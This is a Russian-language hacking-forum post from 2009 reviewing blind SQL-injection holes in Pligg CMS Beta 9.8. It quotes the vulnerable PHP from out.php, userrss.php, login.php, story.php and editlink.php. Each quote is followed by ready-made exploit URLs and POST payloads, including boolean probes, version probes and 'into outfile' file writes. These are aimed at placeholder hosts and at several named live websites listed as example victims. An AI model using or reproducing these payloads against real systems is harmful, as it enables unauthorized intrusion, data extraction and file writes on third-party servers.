Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
29.06.2009, 18:28
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Обзор уязвимостей Pligg
Продукт:Pligg Content Management System
Beta 9.8
09.08.2007
Homepage: http://www.pligg.com Дорк:Powered By Pligg Blind SQL-injection
magic_quotes = off
/out.php
PHP код:
------------------------
...
requestID = $_REQUEST['id'];
$requestTitle = $_REQUEST['title'];
$requestURL = $_REQUEST['url'];
if(isset($requestTitle)){
$requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';");
}
if(isset($requestURL)){
$requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_url` = '$requestURL';");
}
if(is_numeric($requestID)) {
...
------------------------
exploit: http://pligg/out.php?title=' union select if(true,1,null) -- -
http://pligg/out.php?title=' union select if(false,1,null) -- - example:
http://tutoriality.com/out.php?title=1' union select if(true,1,null) -- -
http://tutoriality.com/out.php?title=1' union select if(false,1,null) -- -
exploit: http://pligg/out.php?url=' union select if(true,1,null) -- -
http://pligg/out.php?url=' union select if(false,1,null) -- - example:
http://tutoriality.com/out.php?url=' union select if(true,1,null) -- -
http://tutoriality.com/out.php?url=' union select if(false,1,null) -- -
Blind SQL-injection
register_globals = on
/userrss.php
PHP код:
------------------------
...
if(isset($_REQUEST['user'])){$login = $_REQUEST['user'];}
$user=new User();
$user->username = $login;
if(!$user->read()) {
echo "error: user does not exist";
die;
}
...
if(!empty($_REQUEST['rows']))
$rows = $_REQUEST['rows'];
else $rows = 40;
...
if(!empty($_REQUEST['status'])) {
$status = $_REQUEST['status'];
} else {
// By default it searches on all
if($search) $status = 'all';
else $status = 'all';
}
switch ($status) {
case 'published':
$order_field = 'link_published_date';
$link_date = 'published_date';
$title = $main_smarty->get_config_vars("PLIGG_Visual_Published_News");
$from_where = "FROM " . table_links . " WHERE link_status='published' ";
break;
case 'queued':
... case
... case
... }
$from_where .= " AND link_author=$user->id "; //вот тут можно дописать кусок скул-запроса.
$order_by = " ORDER BY $order_field DESC ";
$last_modified = $db->get_var("SELECT UNIX_TIMESTAMP(max($order_field)) links $from_where");
$sql = "SELECT DISTINCT link_id $from_where $order_by LIMIT $rows";
------------------------
exploit http://pligg/userrss.php?user=god&rows=5&status=1&order_field=l ink_date&from_where=from pligg_links where link_id=1 and true -- -
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=l ink_date&from_where=from pligg_links where link_id=1 and false -- - example
http://masnoticias.dosmanzanas.com/userrss.php?user=BriceLamchi&rows=5&status=1&order _field=link_date&from_where=from pligg_links where link_id=1 and true -- -
http://masnoticias.dosmanzanas.com/userrss.php?user=BriceLamchi&rows=5&status=1&order _field=link_date&from_where=from pligg_links where link_id=1 and false -- -
Blind SQL-injection
magic_quotes_gpc = off
/login.php
PHP код:
------------------------
...
if($_POST["processlogin"] == 3) { // if user requests forgotten password
$username = trim($_POST['username']);
if(strlen($username) == 0){
$errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
}
else {
$user = $db->get_row("SELECT * FROM `" . table_users . "` where `user_login` = '".$username."'");
if($user){
$salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
...
------------------------
exploit: POST:http://pligg/login.php?processlogin=3&username=root' or false -- -
POST:http://pligg/login.php?processlogin=3&username=root' or true -- -
if file_priv=Y
/login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 into outfile '/path/pligg.txt' -- -
POST:http://www.innovationworx.com/cafe/login.php?processlogin=3&username=root' or true -- -
POST:http://www.innovationworx.com/cafe/login.php?processlogin=3&username=root' or false -- -
POST:http://www.innovationworx.com/cafe//login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 into outfile '/tmp/tmp.txt' -- -
Blind SQL-injection
magic_quotes = off
/story.php
PHP код:
-------------------------
...
if(isset($_REQUEST['title'])){$requestTitle = strip_tags($_REQUEST['title']);}
...
if(isset($requestTitle)){
$tmp = "SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';";
$requestID = $db->get_var($tmp);
}
...
-------------------------
exploit: http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- - example:
http://tutoriality.com/story.php?title=sweating__sweating' and (substring(version(),1,1))>1-- -
http://namecritics.com/story.php?title=clock_jewels' and (substring(version(),1,1))%3E1-- -
Blind SQL-injection
/editlink.php
PHP код:
-------------------------
...
if(isset($_GET['id'])){
$theid = strip_tags($_GET['id']);
}
if(isset($_POST['id'])){
$theid = strip_tags($_POST['id']);
}
...
$link = $db->get_row("SELECT link_id, link_author FROM " . table_links . " WHERE link_id=".$theid.";");
if ($link) {
if ($link->link_author==$current_user->user_id || $current_user->user_level == "admin" || $current_user->user_level == "god")
{
...
-------------------------
exploit http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- -
if file_priv=Y
http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- - example:
http://www.innovationworx.com/cafe/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://www.innovationworx.com/cafe/editlink.php?id=-1 union select 1,if(false,'god',1)-- -
(c) AFoST
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид